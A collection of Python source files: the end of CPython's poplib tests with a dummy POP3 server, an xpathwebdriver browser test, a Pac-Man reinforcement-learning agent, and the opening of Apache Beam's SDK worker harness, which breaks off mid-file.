self.create_socket(af, socket.SOCK_STREAM)
self.bind(address)
self.listen(5)
self.active = False
self.active_lock = threading.Lock()
self.host, self.port = self.socket.getsockname()[:2]
self.handler_instance = None
def start(self):
assert not self.active
self.__flag = threading.Event()
threading.Thread.start(self)
self.__flag.wait()
def run(self):
self.active = True
self.__flag.set()
while self.active and asyncore.socket_map:
self.active_lock.acquire()
asyncore.loop(timeout=0.1, count=1)
self.active_lock.release()
asyncore.close_all(ignore_all=True)
def stop(self):
assert self.active
self.active = False
self.join()
def handle_accepted(self, conn, addr):
self.handler_instance = self.handler(conn)
def handle_connect(self):
self.close()
handle_read = handle_connect
def writable(self):
return 0
def handle_error(self):
raise
class TestPOP3Class(TestCase):
def assertOK(self, resp):
self.assertTrue(resp.startswith(b"+OK"))
def setUp(self):
self.server = DummyPOP3Server((HOST, PORT))
self.server.start()
self.client = poplib.POP3(self.server.host, self.server.port)
def tearDown(self):
self.client.quit()
self.server.stop()
def test_getwelcome(self):
self.assertEqual(self.client.getwelcome(),
b'+OK dummy pop3 server ready. <timestamp>')
def test_exceptions(self):
self.assertRaises(poplib.error_proto, self.client._shortcmd, 'echo -err')
def test_user(self):
self.assertOK(self.client.user('guido'))
self.assertRaises(poplib.error_proto, self.client.user, 'invalid')
def test_pass_(self):
self.assertOK(self.client.pass_('python'))
self.assertRaises(poplib.error_proto, self.client.user, 'invalid')
def test_stat(self):
self.assertEqual(self.client.stat(), (10, 100))
def test_list(self):
self.assertEqual(self.client.list()[1:],
([b'1 1', b'2 2', b'3 3', b'4 4', b'5 5'],
25))
self.assertTrue(self.client.list('1').endswith(b"OK 1 1"))
def test_retr(self):
expected = (b'+OK 116 bytes',
[b'From: postmaster@python.org', b'Content-Type: text/plain',
b'MIME-Version: 1.0', b'Subject: Dummy',
b'', b'line1', b'line2', b'line3'],
113)
foo = self.client.retr('foo')
self.assertEqual(foo, expected)
def test_dele(self):
self.assertOK(self.client.dele('foo'))
def test_noop(self):
self.assertOK(self.client.noop())
def test_rpop(self):
self.assertOK(self.client.rpop('foo'))
def test_apop(self):
self.assertOK(self.client.apop('foo', 'dummypassword'))
def test_top(self):
expected = (b'+OK 116 bytes',
[b'From: postmaster@python.org', b'Content-Type: text/plain',
b'MIME-Version: 1.0', b'Subject: Dummy', b'',
b'line1', b'line2', b'line3'],
113)
self.assertEqual(self.client.top(1, 1), expected)
def test_uidl(self):
self.client.uidl()
self.client.uidl('foo')
SUPPORTS_SSL = False
if hasattr(poplib, 'POP3_SSL'):
import ssl
SUPPORTS_SSL = True
CERTFILE = os.path.join(os.path.dirname(__file__) or os.curdir, "keycert.pem")
class DummyPOP3_SSLHandler(DummyPOP3Handler):
def __init__(self, conn):
asynchat.async_chat.__init__(self, conn)
ssl_socket = ssl.wrap_socket(self.socket, certfile=CERTFILE,
server_side=True,
do_handshake_on_connect=False)
self.del_channel()
self.set_socket(ssl_socket)
# Must try handshake before calling push()
self._ssl_accepting = True
self._do_ssl_handshake()
self.set_terminator(b"\r\n")
self.in_buffer = []
self.push('+OK dummy pop3 server ready. <timestamp>')
def _do_ssl_handshake(self):
try:
self.socket.do_handshake()
except ssl.SSLError as err:
if err.args[0] in (ssl.SSL_ERROR_WANT_READ,
ssl.SSL_ERROR_WANT_WRITE):
return
elif err.args[0] == ssl.SSL_ERROR_EOF:
return self.handle_close()
raise
except socket.error as err:
if err.args[0] == errno.ECONNABORTED:
return self.handle_close()
else:
self._ssl_accepting = False
def handle_read(self):
if self._ssl_accepting:
self._do_ssl_handshake()
else:
DummyPOP3Handler.handle_read(self)
class TestPOP3_SSLClass(TestPOP3Class):
# repeat previous tests by using poplib.POP3_SSL
def setUp(self):
self.server = DummyPOP3Server((HOST, PORT))
self.server.handler = DummyPOP3_SSLHandler
self.server.start()
self.client = poplib.POP3_SSL(self.server.host, self.server.port)
def test__all__(self):
self.assertIn('POP3_SSL', poplib.__all__)
def test_context(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
self.assertRaises(ValueError, poplib.POP3_SSL, self.server.host,
self.server.port, keyfile=CERTFILE, context=ctx)
self.assertRaises(ValueError, poplib.POP3_SSL, self.server.host,
self.server.port, certfile=CERTFILE, context=ctx)
self.assertRaises(ValueError, poplib.POP3_SSL, self.server.host,
self.server.port, keyfile=CERTFILE,
certfile=CERTFILE, context=ctx)
self.client.quit()
self.client = poplib.POP3_SSL(self.server.host, self.server.port,
context=ctx)
self.assertIsInstance(self.client.sock, ssl.SSLSocket)
self.assertIs(self.client.sock.context, ctx)
self.assertTrue(self.client.noop().startswith(b'+OK'))
class TestTimeouts(TestCase):
def setUp(self):
self.evt = threading.Event()
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.sock.settimeout(60)  # Safety net. See issue 11812.
self.port = test_support.bind_port(self.sock)
self.thread = threading.Thread(target=self.server, args=(self.evt,self.sock))
self.thread.setDaemon(True)
self.thread.start()
self.evt.wait()
def tearDown(self):
self.thread.join()
del self.thread # Clear out any dangling Thread objects.
def server(self, evt, serv):
serv.listen(5)
evt.set()
try:
conn, addr = serv.accept()
conn.send(b"+ Hola mundo\n")
conn.close()
except socket.timeout:
pass
finally:
serv.close()
def testTimeoutDefault(self):
self.assertTrue(socket.getdefaulttimeout() is None)
socket.setdefaulttimeout(30)
try:
pop = poplib.POP3(HOST, self.port)
finally:
socket.setdefaulttimeout(None)
self.assertEqual(pop.sock.gettimeout(), 30)
pop.sock.close()
def testTimeoutNone(self):
self.assertTrue(socket.getdefaulttimeout() is None)
socket.setdefaulttimeout(30)
try:
pop = poplib.POP3(HOST, self.port, timeout=None)
finally:
socket.setdefaulttimeout(None)
self.assertTrue(pop.sock.gettimeout() is None)
pop.sock.close()
def testTimeoutValue(self):
pop = poplib.POP3(HOST, self.port, timeout=30)
self.assertEqual(pop.sock.gettimeout(), 30)
pop.sock.close()
def test_main():
tests = [TestPOP3Class, TestTimeouts]
if SUPPORTS_SSL:
tests.append(TestPOP3_SSLClass)
thread_info = test_support.threading_setup()
try:
test_support.run_unittest(*tests)
finally:
test_support.threading_cleanup(*thread_info)
if __name__ == '__main__':
test_main()
|
test_XpathBrowser.py
|
# -*- coding: utf-8 -*-
'''
xpathwebdriver
Copyright (c) 2015 Juju. Inc
Code Licensed under MIT License. See LICENSE file.
'''
import unittest
import threading
from contextlib import contextmanager
import bottle
from selenium.webdriver.remote.webdriver import WebDriver
from xpathwebdriver.browser import Browser
from xpathwebdriver.default_settings import DefaultSettings
from xpathwebdriver.solve_settings import register_settings_instance,\
solve_settings
class WebUnitTestBase(unittest.TestCase):
port = 8080
host = 'localhost'
@classmethod
def _path_to_url(cls, path):
return f'http://{cls.host}:{cls.port}/{path}'
@classmethod
def get_local_page(cls, path):
cls.browser.get_url(cls._path_to_url(path))
@contextmanager
def create_html(self, name, body, **kwargs):
try:
self.push_page(name, body, **kwargs)
yield name
except:
raise
finally:
self.pop_page(name)
def push_page(self, name, body, **kwargs):
templ = '''
<!DOCTYPE html>
<html>
<head>
{jquery}
<title>{name}</title>
</head>
<body>
{body}
</body>
</html>
'''
jquery = ''
tmpl_vars = locals().copy()
tmpl_vars.update(kwargs)
self._pages_cache[name] = templ.format(**tmpl_vars)
def pop_page(self, name):
return self._pages_cache.pop(name)
@classmethod
def setUpClass(cls):
class Settings(DefaultSettings):
xpathbrowser_sleep_multiplier = 0.1
xpathbrowser_sleep_default_time = 0.1
register_settings_instance(Settings())
cls.browser = Browser(settings=solve_settings())
cls._pages_cache = {}
cls.setup_http_server()
@classmethod
def setup_http_server(cls):
class MyServer(bottle.WSGIRefServer):
def run(self, app): # pragma: no cover
from wsgiref.simple_server import WSGIRequestHandler, WSGIServer
from wsgiref.simple_server import make_server
import socket
class FixedHandler(WSGIRequestHandler):
def address_string(self): # Prevent reverse DNS lookups please.
return self.client_address[0]
def log_request(*args, **kw):
if not self.quiet:
return WSGIRequestHandler.log_request(*args, **kw)
handler_cls = self.options.get('handler_class', FixedHandler)
server_cls = self.options.get('server_class', WSGIServer)
if ':' in self.host: # Fix wsgiref for IPv6 addresses.
if getattr(server_cls, 'address_family') == socket.AF_INET:
class server_cls(server_cls):
address_family = socket.AF_INET6
srv = make_server(self.host, self.port, app, server_cls, handler_cls)
### save tcp server so we can shut it down later
cls._tcp_server = srv
srv.serve_forever()
@bottle.route('/<name>')
def index(name):
if name == 'kill':
raise SystemExit()
if name in cls._pages_cache:
return bottle.template(cls._pages_cache[name])
return None
kwargs = dict(server=MyServer, host=cls.host, port=cls.port)
thread = threading.Thread(target=bottle.run, kwargs=kwargs)
thread.start()
cls._server_thread = thread
@classmethod
def tearDownClass(cls):
del cls.browser
cls._tcp_server.shutdown()
class TestXpathBrowser(WebUnitTestBase):
'''
TODO:
- get_url (with condition)
- get_path (with condition)
'''
def test_fill(self):
body = '''
<form>
First name:<br>
<input id=1 type="text" name="firstname">
<br>
Last name:<br>
<input id=2 type="text" name="lastname">
</form>
'''
self.browser.set_base_url('http://mepinta.com/')
self.assertEqual(self.browser.build_url('example'), 'http://mepinta.com/example')
with self.create_html('test_fill', body) as path:
self.get_local_page(path)
self.assertTrue(self.browser.current_path.endswith('test_fill'))
self.assertTrue(self.browser.current_url.endswith('test_fill'))
self.assertIsInstance(self.browser.get_driver(), WebDriver)
self.browser.fill_form(firstname='John1', lastname='Doe1')
self.browser.fill_form_attr('id', {1:'John2', 2:'Doe2'})
self.browser.fill_form_ordered([('firstname','John3'), ('lastname','Doe3')])
self.browser.fill_form_xpath({'//form/input[1]':'John4','//form/input[2]':'Doe4'})
def test_click(self):
body = "<button id='example_button'>Example</button>"
with self.create_html('test_click', body) as path:
self.get_local_page(path)
self.browser.click('.//button')
self.browser.click(".//*[@id='example_button']")
def test_sleep(self):
self.browser.sleep()
self.browser.sleep(0.1)
self.browser.sleep(0.1, condition='>')
self.browser.sleep(condition='<')
self.browser.sleep(0.05, condition='=')
self.browser.sleep(1, condition='><')
def test_select(self):
body = '''
<div>
<div id='some_text'>
<p>The quick fox jumped over the Lorem Ipsum.</p>
</div>
<div id='some_other'>
<p>The other quick fox jumped over the Lorem Ipsum.</p>
</div>
</div>
'''
with self.create_html('test_select', body) as path:
self.get_local_page(path)
self.assertTrue(self.browser.select_xpath('//div'))
self.assertTrue(self.browser.select_xsingle('//div'))
found = self.browser.wait_condition(lambda b: b.select_xpath('//div'))
self.assertTrue(found)
found = self.browser.wait_condition(lambda b: b.select_xpath('//div/form'), max_wait=0.1)
self.assertFalse(found)
# default condition
found = self.browser.wait_condition()
self.assertTrue(found)
def test_window(self):
body = "<h1>Example</h1>"
with self.create_html('test_target_window', body) as target:
body = f"<a href='{self._path_to_url(target)}' target='blank'>Example</a>"
with self.create_html('test_window', body) as path:
self.get_local_page(path)
self.browser.click('.//a')
with self.browser.window():
self.assertTrue(self.browser.xpath('//h1/text()'))
if __name__ == "__main__":
unittest.main()
|
agent.py
|
import threading
import settings as s
from collections import namedtuple, deque
from api.actions import Actions
from analytics_frame import Analytics
from api.agent_analytics_frame import AgentAnalyticsFrameAPI
import random
import math
import copy
from sklearn.preprocessing import MinMaxScaler
import numpy as np
import torch
import torch.nn as nn
import torch.optim as optim
import torch.nn.functional as F
DEVICE = torch.device("cpu") # use CPU rather than Cuda GPU to power agent
EXPERIENCE = namedtuple("Experience",
field_names=["state", "action", "reward", "next_state"])
GAMMA = 0.999
is_calc_grad = False
class LearnerAgent(AgentAnalyticsFrameAPI):
agent_instance = None
@staticmethod
def create_agent_instance(game_inst):
if LearnerAgent.agent_instance is None:
LearnerAgent.agent_instance = LearnerAgent(game_inst, EpsilonGreedyStrategy(s.EPSILON_START, s.EPSILON_END, s.EPSILON_DECAY))
@staticmethod
def run_decision():
thread = threading.Thread(target=LearnerAgent.agent_instance.decide)
thread.start()
@staticmethod
def reset():
LearnerAgent.agent_instance.reset_agent()
def __init__(self, pacman_inst, learning_strat):
self.api = pacman_inst
self.learning_strat = learning_strat
self.learning_rate = None
self.policy_net = Network(pacman_inst)
self.target_net = Network(pacman_inst)
self.target_net.load_state_dict(self.policy_net.state_dict())
self.target_net.eval()
self.memory = ReplayMemory(s.REPLAY_MEMORY_SIZE)
self.current_state = self.get_game_vals(True)
self.prev_decision = None
self.ghost_list = []
self.pellet_tuple = ()
self.power_tuple = ()
self.power_active = False
self.decision = None
self.decision_type = ""
self.decision_count = 0
def reset_agent(self):
self.policy_net = Network(self.api)
self.target_net = Network(self.api)
self.target_net.load_state_dict(self.policy_net.state_dict())
self.target_net.eval()
self.learning_rate = None
self.memory = ReplayMemory(s.REPLAY_MEMORY_SIZE)
self.current_state = self.get_game_vals(True)
self.prev_decision = None
self.ghost_list = []
self.pellet_tuple = ()
self.power_tuple = ()
self.power_active = False
self.decision = None
self.decision_type = ""
self.decision_count = 0
def decide(self):
state = self.get_game_vals(True)
rate = self.learning_strat.get_rate()
decision = None
if random.random() > rate:
with torch.no_grad():
output = self.policy_net(state).tolist()
best_decision = (Actions.UP, -1000000)
for action in self.api.getAvailableActions(None):
if output[action.value] > best_decision[1]:
best_decision = (action, output[action.value])
decision = best_decision[0]
self.decision_type = "EXPLOITATION"
#print("Calculated decision: " + str(decision))
else:
decision = random.choice(self.api.getAvailableActions(self.prev_decision))
self.decision_type = "EXPLORATION"
#print("Random decision: " + str(decision))
self.choose_action(decision)
self.prev_decision = decision
self.memory.add(self.current_state.unsqueeze(0), torch.tensor([[decision.value]]),
torch.tensor([[self.api.getReward()]]), state.unsqueeze(0))
if self.memory.can_provide_sample(s.REPLAY_BATCH_SIZE) and safe_batch():
torch.autograd.set_detect_anomaly(True)
toggle_safe_batch()
transitions = self.memory.sample(s.REPLAY_BATCH_SIZE)
batch = EXPERIENCE(*zip(*transitions))
non_final_mask = torch.tensor(tuple(map(lambda s: s is not None,
batch.next_state)), device=DEVICE, dtype=torch.bool)
non_final_next_states = torch.cat([s for s in batch.next_state
if s is not None])
state_batch = torch.cat(batch.state).clone()
action_batch = torch.cat(batch.action).clone()
reward_batch = torch.cat(batch.reward).clone()
state_action_values = self.policy_net(state_batch).gather(1, action_batch).clone() #this line fails to compute gradient
next_state_values = torch.zeros(s.REPLAY_BATCH_SIZE, device=DEVICE)
next_state_values[non_final_mask] = self.target_net(non_final_next_states).max(1)[0].detach().clone()
expected_state_action_values = next_state_values * GAMMA
for i in range(s.REPLAY_BATCH_SIZE):
expected_state_action_values[i] = expected_state_action_values[i] + reward_batch[i][0]
expected_state_action_values = expected_state_action_values.unsqueeze(1)
loss = F.smooth_l1_loss(state_action_values.clone(), expected_state_action_values).clone()
optimizer = optim.RMSprop(self.policy_net.parameters(),
lr=self.init_learning_rate() if self.learning_rate is None else self.learning_rate)
optimizer.zero_grad()
loss.backward() # BUG: this fails after a few runs
for param in self.policy_net.parameters():
param.grad.data.clamp_(-1, 1)
optimizer.step()
toggle_safe_batch()
self.current_state = state
def choose_action(self, decision):
if decision is Actions.UP:
self.decision = "UP"
self.api.moveUp()
elif decision is Actions.DOWN:
self.decision = "DOWN"
self.api.moveDown()
elif decision is Actions.LEFT:
self.decision = "LEFT"
self.api.moveLeft()
elif decision is Actions.RIGHT:
self.decision = "RIGHT"
self.api.moveRight()
self.decision_count += 1
def get_game_vals(self, normalize):
ghost_list = self.api.getGhostsGridCoords()
pellet_tuple = self.api.getNearestPelletGridCoords()
power_tuple = self.api.getNearestPowerPelletGridCoords()
power_active = self.api.isPowerPelletActive()
values = [ghost_list[0][0], ghost_list[0][1], ghost_list[1][0], ghost_list[1][1], ghost_list[2][0],
ghost_list[2][1], ghost_list[3][0], ghost_list[3][1], pellet_tuple[0], pellet_tuple[1],
power_tuple[0], power_tuple[1], s.GRID_H if power_active else -s.GRID_H]
value_length = len(values)
if normalize:
values.append(-s.GRID_H)
values.append(s.GRID_H)
values = MinMaxScaler(feature_range=(-1, 1)).fit_transform(np.array(values).reshape(-1, 1)).reshape(len(values),).tolist()
tensor = torch.Tensor(values[:value_length])
self.ghost_list = ghost_list
self.pellet_tuple = pellet_tuple
self.power_tuple = power_tuple
self.power_active = power_active
return tensor
def init_learning_rate(self):
self.learning_rate = Analytics.analytics_instance.learning_rate
return self.learning_rate
# -- -- -- AGENT API FUNCTIONS -- -- -- #
def get_network_structure(self):
return [13, 10, 10, 8, 4]
def get_activation_vals(self, layer_index):
try:
return self.policy_net.full_node_dist[layer_index]
except IndexError:
return None
def get_weights(self, layer_index):
try:
return next((weights[1] for weights in self.policy_net.full_weight_dist if weights[0] == layer_index), None)
# return self.policy_net.full_weight_dist[layer_index]
except IndexError:
return None
def get_logic_count(self):
return self.decision_count
def get_ghost_coords(self):
return self.ghost_list
def get_nearest_pellet_coords(self):
return self.pellet_tuple
def get_nearest_power_pellet_coords(self):
return self.power_tuple
def get_power_pellet_active_status(self):
return self.power_active
def get_decision(self):
return self.decision, self.decision_type
def set_learning_rate(self, learning_rate):
pass
def set_target_score(self, target_score):
self.api.setTarHighScore(target_score)
def set_game_start_pos(self, pos_dict, centered_start):
self.api.set_start_pos(pos_dict, centered_start)
def stop_sim(self):
pass
def start_sim(self):
self.api.gameStart()
def safe_batch():
return not is_calc_grad
def toggle_safe_batch():
global is_calc_grad
is_calc_grad = not is_calc_grad
class Network(nn.Module):
def __init__(self, pacmanInst):
super(Network, self).__init__()
self.input = nn.Linear(13, 10)
self.h1 = nn.Linear(10, 10)
self.h2 = nn.Linear(10, 8)
self.output = nn.Linear(8, 4)
self.squishifier = nn.Tanh()
self.api = pacmanInst
self.full_node_dist = []
self.full_weight_dist = []
def forward(self, x):
input_is_batch = isinstance(x.tolist()[0], list)
node_dist = [self.squishifier(x).tolist()]
weight_dist = []
for index, layer in [(0, self.input), (1, self.h1), (2, self.h2), (3, self.output)]:
x = layer(x)
x = self.squishifier(x)
if not input_is_batch:
node_dist.append(x.tolist())
weight_dist.append((index, layer.weight.tolist()))
if not input_is_batch:
self.full_node_dist = node_dist
self.full_weight_dist = weight_dist
return x
class ReplayMemory:
def __init__(self, capacity):
self.capacity = capacity
self.memory = deque(maxlen=capacity)
self.push_count = 0
def add(self,state, action, reward, next_state):
if len(self.memory) >= self.capacity:
self.memory[self.push_count % self.capacity] = EXPERIENCE(state,action,reward,next_state)
else:
self.memory.append(EXPERIENCE(state,action,reward,next_state))
self.push_count += 1
def sample(self, batch_size):
sampled_exp = random.sample(self.memory, batch_size)
return sampled_exp
def can_provide_sample(self, batch_size):
return len(self.memory) >= batch_size
def __len__(self):
return len(self.memory)
class EpsilonGreedyStrategy:
def __init__(self, start, end, decay):
self.start = start
self.end = end
self.decay = decay
self.step_count = 0
self.threshold = 0
def get_rate(self):
self.threshold = self.end + (self.start - self.end) * math.exp(-1 * self.step_count / self.decay)
self.step_count += 1
return self.threshold
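# --- Illustrative sketch (editorial addition, not part of the original module) ---
# The exploration rate above decays as end + (start - end) * exp(-step / decay).
# A quick way to eyeball a schedule (the values below are examples, not the
# project's actual s.EPSILON_* settings):
def _print_epsilon_schedule_sketch(start=1.0, end=0.05, decay=200, steps=(0, 100, 500, 1000)):
    """Prints the epsilon threshold at a few step counts for inspection."""
    for step in steps:
        rate = end + (start - end) * math.exp(-1 * step / decay)
        print("step={:5d}  epsilon={:.3f}".format(step, rate))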
|
sdk_worker.py
|
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""SDK harness for executing Python Fns via the Fn API."""
# pytype: skip-file
# mypy: disallow-untyped-defs
import abc
import collections
import contextlib
import functools
import logging
import queue
import sys
import threading
import time
import traceback
from concurrent import futures
from typing import TYPE_CHECKING
from typing import Any
from typing import Callable
from typing import DefaultDict
from typing import Dict
from typing import FrozenSet
from typing import Generic
from typing import Iterable
from typing import Iterator
from typing import List
from typing import MutableMapping
from typing import Optional
from typing import Tuple
from typing import TypeVar
from typing import Union
import grpc
from apache_beam.coders import coder_impl
from apache_beam.metrics import monitoring_infos
from apache_beam.metrics.execution import MetricsEnvironment
from apache_beam.portability.api import beam_fn_api_pb2
from apache_beam.portability.api import beam_fn_api_pb2_grpc
from apache_beam.portability.api import metrics_pb2
from apache_beam.runners.worker import bundle_processor
from apache_beam.runners.worker import data_plane
from apache_beam.runners.worker import statesampler
from apache_beam.runners.worker.channel_factory import GRPCChannelFactory
from apache_beam.runners.worker.data_plane import PeriodicThread
from apache_beam.runners.worker.statecache import StateCache
from apache_beam.runners.worker.worker_id_interceptor import WorkerIdInterceptor
from apache_beam.runners.worker.worker_status import FnApiWorkerStatusHandler
from apache_beam.utils import thread_pool_executor
from apache_beam.utils.sentinel import Sentinel
if TYPE_CHECKING:
from apache_beam.portability.api import endpoints_pb2
from apache_beam.utils.profiler import Profile
T = TypeVar('T')
_KT = TypeVar('_KT')
_VT = TypeVar('_VT')
_LOGGER = logging.getLogger(__name__)
DEFAULT_BUNDLE_PROCESSOR_CACHE_SHUTDOWN_THRESHOLD_S = 60
# The number of ProcessBundleRequest instruction ids the BundleProcessorCache
# will remember for not running instructions.
MAX_KNOWN_NOT_RUNNING_INSTRUCTIONS = 1000
# The number of ProcessBundleRequest instruction ids that BundleProcessorCache
# will remember for failed instructions.
MAX_FAILED_INSTRUCTIONS = 10000
class ShortIdCache(object):
""" Cache for MonitoringInfo "short ids"
"""
def __init__(self):
# type: () -> None
self._lock = threading.Lock()
self._last_short_id = 0
self._info_key_to_short_id = {} # type: Dict[FrozenSet, str]
self._short_id_to_info = {} # type: Dict[str, metrics_pb2.MonitoringInfo]
def get_short_id(self, monitoring_info):
# type: (metrics_pb2.MonitoringInfo) -> str
""" Returns the assigned shortId for a given MonitoringInfo, assigns one if
not assigned already.
"""
key = monitoring_infos.to_key(monitoring_info)
with self._lock:
try:
return self._info_key_to_short_id[key]
except KeyError:
self._last_short_id += 1
# Convert to a hex string (and drop the '0x') for some compression
shortId = hex(self._last_short_id)[2:]
payload_cleared = metrics_pb2.MonitoringInfo()
payload_cleared.CopyFrom(monitoring_info)
payload_cleared.ClearField('payload')
self._info_key_to_short_id[key] = shortId
self._short_id_to_info[shortId] = payload_cleared
return shortId
def get_infos(self, short_ids):
#type: (Iterable[str]) -> Dict[str, metrics_pb2.MonitoringInfo]
""" Gets the base MonitoringInfo (with payload cleared) for each short ID.
Throws KeyError if an unassigned short ID is encountered.
"""
return {
short_id: self._short_id_to_info[short_id]
for short_id in short_ids
}
SHORT_ID_CACHE = ShortIdCache()
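# Illustrative usage of the cache above (editorial note, hedged; not part of the
# Beam API surface):
#   info = metrics_pb2.MonitoringInfo()           # some populated MonitoringInfo
#   short_id = SHORT_ID_CACHE.get_short_id(info)  # e.g. '1', '2', ... (hex counter)
#   SHORT_ID_CACHE.get_infos([short_id])          # maps short id -> payload-cleared info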
class SdkHarness(object):
REQUEST_METHOD_PREFIX = '_request_'
def __init__(
self,
control_address, # type: str
credentials=None, # type: Optional[grpc.ChannelCredentials]
worker_id=None, # type: Optional[str]
# Caching is disabled by default
state_cache_size=0, # type: int
# time-based data buffering is disabled by default
data_buffer_time_limit_ms=0, # type: int
profiler_factory=None, # type: Optional[Callable[..., Profile]]
status_address=None, # type: Optional[str]
# Heap dump through status api is disabled by default
enable_heap_dump=False, # type: bool
):
# type: (...) -> None
self._alive = True
self._worker_index = 0
self._worker_id = worker_id
self._state_cache = StateCache(state_cache_size)
options = [('grpc.max_receive_message_length', -1),
('grpc.max_send_message_length', -1)]
if credentials is None:
_LOGGER.info('Creating insecure control channel for %s.', control_address)
self._control_channel = GRPCChannelFactory.insecure_channel(
control_address, options=options)
else:
_LOGGER.info('Creating secure control channel for %s.', control_address)
self._control_channel = GRPCChannelFactory.secure_channel(
control_address, credentials, options=options)
grpc.channel_ready_future(self._control_channel).result(timeout=60)
_LOGGER.info('Control channel established.')
self._control_channel = grpc.intercept_channel(
self._control_channel, WorkerIdInterceptor(self._worker_id))
self._data_channel_factory = data_plane.GrpcClientDataChannelFactory(
credentials, self._worker_id, data_buffer_time_limit_ms)
self._state_handler_factory = GrpcStateHandlerFactory(
self._state_cache, credentials)
self._profiler_factory = profiler_factory
def default_factory(id):
# type: (str) -> beam_fn_api_pb2.ProcessBundleDescriptor
return self._control_stub.GetProcessBundleDescriptor(
beam_fn_api_pb2.GetProcessBundleDescriptorRequest(
process_bundle_descriptor_id=id))
self._fns = KeyedDefaultDict(default_factory)
# BundleProcessor cache across all workers.
self._bundle_processor_cache = BundleProcessorCache(
state_handler_factory=self._state_handler_factory,
data_channel_factory=self._data_channel_factory,
fns=self._fns)
if status_address:
try:
self._status_handler = FnApiWorkerStatusHandler(
status_address, self._bundle_processor_cache,
enable_heap_dump) # type: Optional[FnApiWorkerStatusHandler]
except Exception:
traceback_string = traceback.format_exc()
_LOGGER.warning(
'Error creating worker status request handler, '
'skipping status report. Trace back: %s' % traceback_string)
else:
self._status_handler = None
# TODO(BEAM-8998) use common
# thread_pool_executor.shared_unbounded_instance() to process bundle
# progress once dataflow runner's excessive progress polling is removed.
self._report_progress_executor = futures.ThreadPoolExecutor(max_workers=1)
self._worker_thread_pool = thread_pool_executor.shared_unbounded_instance()
self._responses = queue.Queue(
) # type: queue.Queue[Union[beam_fn_api_pb2.InstructionResponse, Sentinel]]
_LOGGER.info('Initializing SDKHarness with unbounded number of workers.')
def run(self):
# type: () -> None
self._control_stub = beam_fn_api_pb2_grpc.BeamFnControlStub(
self._control_channel)
no_more_work = Sentinel.sentinel
def get_responses():
# type: () -> Iterator[beam_fn_api_pb2.InstructionResponse]
while True:
response = self._responses.get()
if response is no_more_work:
return
yield response
self._alive = True
try:
for work_request in self._control_stub.Control(get_responses()):
_LOGGER.debug('Got work %s', work_request.instruction_id)
request_type = work_request.WhichOneof('request')
# Name spacing the request method with 'request_'. The called method
# will be like self.request_register(request)
getattr(self, SdkHarness.REQUEST_METHOD_PREFIX + request_type)(
work_request)
finally:
self._alive = False
_LOGGER.info('No more requests from control plane')
_LOGGER.info('SDK Harness waiting for in-flight requests to complete')
# Wait until existing requests are processed.
self._worker_thread_pool.shutdown()
# get_responses may be blocked on responses.get(), but we need to return
# control to its caller.
self._responses.put(no_more_work)
# Stop all the workers and clean all the associated resources
self._data_channel_factory.close()
self._state_handler_factory.close()
self._bundle_processor_cache.shutdown()
if self._status_handler:
self._status_handler.close()
_LOGGER.info('Done consuming work.')
def _execute(
self,
task, # type: Callable[[], beam_fn_api_pb2.InstructionResponse]
request # type: beam_fn_api_pb2.InstructionRequest
):
# type: (...) -> None
with statesampler.instruction_id(request.instruction_id):
try:
response = task()
except Exception: # pylint: disable=broad-except
traceback_string = traceback.format_exc()
print(traceback_string, file=sys.stderr)
_LOGGER.error(
'Error processing instruction %s. Original traceback is\n%s\n',
request.instruction_id,
traceback_string)
response = beam_fn_api_pb2.InstructionResponse(
instruction_id=request.instruction_id, error=traceback_string)
self._responses.put(response)
def _request_register(self, request):
# type: (beam_fn_api_pb2.InstructionRequest) -> None
# registration request is handled synchronously
self._execute(lambda: self.create_worker().do_instruction(request), request)
def _request_process_bundle(self, request):
# type: (beam_fn_api_pb2.InstructionRequest) -> None
self._bundle_processor_cache.activate(request.instruction_id)
self._request_execute(request)
def _request_process_bundle_split(self, request):
# type: (beam_fn_api_pb2.InstructionRequest) -> None
self._request_process_bundle_action(request)
def _request_process_bundle_progress(self, request):
# type: (beam_fn_api_pb2.InstructionRequest) -> None
self._request_process_bundle_action(request)
def _request_process_bundle_action(self, request):
# type: (beam_fn_api_pb2.InstructionRequest) -> None
def task():
# type: () -> None
self._execute(
lambda: self.create_worker().do_instruction(request), request)
self._report_progress_executor.submit(task)
def _request_finalize_bundle(self, request):
# type: (beam_fn_api_pb2.InstructionRequest) -> None
self._request_execute(request)
def _request_harness_monitoring_infos(self, request):
# type: (beam_fn_api_pb2.InstructionRequest) -> None
process_wide_monitoring_infos = MetricsEnvironment.process_wide_container(
).to_runner_api_monitoring_infos(None).values()
self._execute(
lambda: beam_fn_api_pb2.InstructionResponse(
instruction_id=request.instruction_id,
harness_monitoring_infos=(
beam_fn_api_pb2.HarnessMonitoringInfosResponse(
monitoring_data={
SHORT_ID_CACHE.get_short_id(info): info.payload
for info in process_wide_monitoring_infos
}))),
request)
def _request_monitoring_infos(self, request):
# type: (beam_fn_api_pb2.InstructionRequest) -> None
self._execute(
lambda: beam_fn_api_pb2.InstructionResponse(
instruction_id=request.instruction_id,
monitoring_infos=beam_fn_api_pb2.MonitoringInfosMetadataResponse(
monitoring_info=SHORT_ID_CACHE.get_infos(
request.monitoring_infos.monitoring_info_id))),
request)
def _request_execute(self, request):
# type: (beam_fn_api_pb2.InstructionRequest) -> None
def task():
# type: () -> None
self._execute(
lambda: self.create_worker().do_instruction(request), request)
self._worker_thread_pool.submit(task)
_LOGGER.debug(
"Currently using %s threads." % len(self._worker_thread_pool._workers))
def create_worker(self):
# type: () -> SdkWorker
return SdkWorker(
self._bundle_processor_cache,
state_cache_metrics_fn=self._state_cache.get_monitoring_infos,
profiler_factory=self._profiler_factory)
class BundleProcessorCache(object):
"""A cache for ``BundleProcessor``s.
``BundleProcessor`` objects are cached by the id of their
``beam_fn_api_pb2.ProcessBundleDescriptor``.
Attributes:
fns (dict): A dictionary that maps bundle descriptor IDs to instances of
``beam_fn_api_pb2.ProcessBundleDescriptor``.
state_handler_factory (``StateHandlerFactory``): Used to create state
